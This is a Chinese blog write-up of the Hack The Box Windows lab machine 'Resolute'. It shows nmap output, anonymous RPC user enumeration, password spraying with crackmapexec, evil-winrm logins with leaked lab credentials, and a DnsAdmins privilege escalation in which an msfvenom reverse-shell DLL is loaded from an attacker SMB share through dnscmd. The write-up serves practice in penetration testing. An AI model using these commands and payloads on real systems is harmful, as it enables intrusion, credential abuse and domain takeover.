【Hack The Box】windows练习-- Resolute

最新推荐文章于 2024-05-28 18:00:00 发布
最新推荐文章于 2024-05-28 18:00:00 发布
阅读量419 收藏
点赞数
分类专栏: Hack The Box 文章标签: windows microsoft
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127827781
版权

HTB 学习笔记

【Hack The Box】windows练习-- Resolute

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年9月7日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-18 01:02:23Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/17%Time=5E225762%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h47m32s, deviation: 4h37m09s, median: 7m30s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-01-17T17:03:05-08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-01-18T01:03:02
|_  start_date: 2020-01-17T22:07:40

megabank.local
(Domain: megabank.local, Site: Default-First-Site-Name)
主要枚举内容,ldap.smb,

我看445smb

smbmap -H 10.129.96.155

在这里插入图片描述smbmap -H 10.129.96.155 -u 0xdf

在这里插入图片描述
smbclient -N -L \\10.129.96.1555在这里插入图片描述

我看rpc445

rpcclient -U "" -N 10.129.96.155
enumdomusers

在这里插入图片描述
查看0x1f4用户详细信息

queryuser 0x1f4

在这里插入图片描述
查看所有用户基本信息
querydispinfo

在这里插入图片描述
可以看到0x457用户暴露出了密码

但是登陆不上,smb也登陆不上

crackmapexec winrm 10.129.96.155 -u marco -p 'Welcome123!' --continue-on-success

在这里插入图片描述

密码喷洒

我手动把所有枚举出的用户提取出来制作成了user.txt
而后进行密码喷洒

crackmapexec smb 10.129.96.155 -u user.txt -p 'Welcome123!' --continue-on-success

在这里插入图片描述得到了melanie用户
megabank.local\melanie:Welcome123!

登陆

evil-winrm -i 10.129.96.155 -P 5985 -u melanie -p 'Welcome123!'

在这里插入图片描述

枚举

Get-ChildItem c:\  -Include *.txt -recurse -erroraction -force

用这个命令我找到了全部的txt文件

也可以全局搜索,但是会有错误信息

在这里插入图片描述
在这里插入图片描述
我们打开这个文件,就可以看到一个用户密码
ryan Serv3r4Admin4cc123!

我再次登陆

evil-winrm -i 10.129.96.155 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'

在这里插入图片描述每一分钟自动回复,恶心恶心
在这里插入图片描述
在这里插入图片描述whoami /groups
在这里插入图片描述发现属于dnsadmin组

dnsadmin

```clike
1. 开启一个共享
smbserver.py s .
2. 生成payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=8888 -f dll -o rev.dll
3. 加载payload
dnscmd.exe /config /serverlevelplugindll \\10.10.14.8\s\rev.dll
4. 重启dns服务
sc.exe \\resolute stop dns
sc.exe \\resolute start dns


![在这里插入图片描述](https://img-blog.csdnimg.cn/d48ea6092b334283a684ed242244df2e.png)

![在这里插入图片描述](https://img-blog.csdnimg.cn/61466a77cf944ebb9315cf17e2778e3d.png)
人间体佐菲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透测试3:HTB之Resolute
d3f4ult的博客
01-18 7173
文章目录介绍前期准备工作 介绍 Hackthebox的resolute靶机操作系统为windows,之前没有接触过windows系统的渗透,不过在大佬的提示下还是拿到了flag。 通过此次渗透可以学习到: 1.rpcclinet命令的使用 2.enum4linux工具的使用 3.windows系统渗透大体思路。 4.nc.exe工具的使用 5.msfvenom工具的使用,进而接触到了veil,话说...
resolute-saga:佐贺模式坚决
05-02
坚决的传奇佐贺模式坚决。 具有超时和间隔的分布式事件驱动任务。什么有效一切都可能。下一个次要版本修饰整个事情传奇实例的墓碑下一个主要版本很多测试场景正确地绘制状态在可能的情况下确定更好的过渡
0x0C-HackTheBox-Resolute
0pr
05-01 1056
Set up 目标机器在 10.10.10.169 Recon Nmap # Nmap 7.80 scan initiated Wed Apr 29 23:11:13 2020 as: nmap -A -T4 -p- -v -oN nmap.txt 10.10.10.169 Increasing send delay for 10.10.10.169 from 0 to 5 due to 60 o...
No.187-HackTheBox-windows-Resolute-Walkthrough渗透学习
qq_34801745的博客
08-19 326
** HackTheBox-windows-Resolute-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/220 靶机难度:中级(4.7/10) 靶机发布日期:2020年5月28日 靶机描述: Resolute is an easy difficulty Windows machine that features Active Directory. The Active Directory anonymous bin
Hackthebox - Resolute- linux
yutianovo的博客
03-12 351
Hackthebox - Resolute- linux
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2770
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
Redux异步操作redux-thunk
sxs7970的博客
06-01 279
文章目录这个功能添加到什么地方呢?使用方法例子启动redux-devtools 工具 Action 发出以后,Reducer 立即算出 State,这叫做同步;Action 发出以后,过一段时间再执行 Reducer,这就是异步. 怎么才能 Reducer 在异步操作结束后自动执行呢?这就要用到新的工具:中间件;(xxxMiddleware) redux-thunk 是一个比较流行的 redux...
TCL - 库编译过程和官方手册
谢绝留言与私信
12-04 364
想看看sqlite3的官方demo工程, 没看到. 想编译一下sqlite3源码, 看看编译后有没有example 工程.看了sqlite3的官方说明, 他们工程使用tcl来编译的.一听tcl, 咋这么耳熟呢?去看了一下笔记, 原来cadence中也是可以用TCL命令的.搜索了一下*.tcl, 在本机上好多软件都用这个.将TCL库编译通过, 大致看了一下TCL官方教程.
坚决曲棍球「Resolute Lacrosse」-crx插件
03-11
Chrome的主题为坚定的曲棍球运动员。 每次您在Chrome浏览器中打开新页面时,都会加载“坚毅曲棍球”主题页面。 支持语言:English (United States)
Resolute: New Years Resolution Revolver-crx插件
04-03
语言:English (United States) 此扩展程序可以使您的分辨率保持完好无损。
resolute-bottle:MovieLens数据集搜索应用程序的后端。 Resolute.ai的带回家项目
03-28
坚决瓶MovieLens数据集搜索应用程序的后端/前端。 Resolute.ai的带回家项目
坚决:新年解决左轮手枪「Resolute: New Years Resolution Revolver」-crx插件
03-23
这个扩展允许你保持你的决议完好无损,精美。 支持语言:English (United States)
CLIP 源码分析:simple_tokenizer.py
qq_53324833的博客
05-28 384
不难发现,simple_tokenizer.py 这个文件模块就是用来处理我们输入的文本数据的,主要是一些编码上的处理、文本数据的清洗以及文本格式的转换。在最后我们会手动 debug 走一遍流程,看看该项目的各个部分到底是怎么做的都负责了什么。
黑马聚合的分类及实现
weixin_51920385的博客
05-28 628
聚合是对文档数据的统计、分析、计算聚合的常见种类有哪些?
深入解析:如何在遍历List时安全地删除元素
最新发布
fudaihb的博客
05-28 876
在日常的Java开发中,List是一种非常常用的数据结构。无论是管理用户列表,还是处理复杂的数据集,List都能很方便地满足我们的需求。然而,很多时候我们会遇到需要一边遍历List,一边删除满足特定条件的元素。在这个过程中,稍有不慎就会引发生命周期中的并发修改异常(ConcurrentModificationException)或者其他逻辑错误。本文将从多个角度详尽解析如何在遍历List时安全地删除元素,探讨不同的实现方法及其优缺点。
Day01-python函数
DrKYQ的博客
05-27 840
函数就是代码片段的封装,实现某一特定功能,当程序中需要执行该功能时,可以通过函数调用方式,执行函数中封装的代码片段函数中三要素函数名 必须定义参数 (可选)将数据传递函数中使用返回值 (可选)将函数中的数据传递外部进行使用# 函数的介绍# 功能1def login(name_list,password_list): # 接受参数# 函数作用域# 通过四个空格,来确认函数所执行的逻辑从哪里开始name = input('请输入用户名:')
stream-并行流
qq_40603125的博客
05-27 417
【代码】stream-并行流。
重学java 49 List接口
m0_73983707的博客
05-28 986
是collection接口的子接口ArrayList是List接口的实现类a.不是一new底层就会创建初始容量为10的空列表,而是第一次add的时候才会创建初始化容量为10的空列表b.ArrayList底层是数组,那么为啥还说集合长度可变呢?ArrayList底层会自动扩容 —> Arrays.copyofc.扩容多少倍?1.5倍2.LinkedList集合的使用及源码分析LinkedList是List接口的实现类。
wavering可以作为创业的反义词吗
06-13
是的,"wavering" 的意思是犹豫、摇摆不定、动摇,因此可以将其视为...因此,与 "wavering" 相关的反义词可以是 "decisive"(果断的)、"resolute"(坚决的)或 "determined"(有决心的)。希望这可以回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值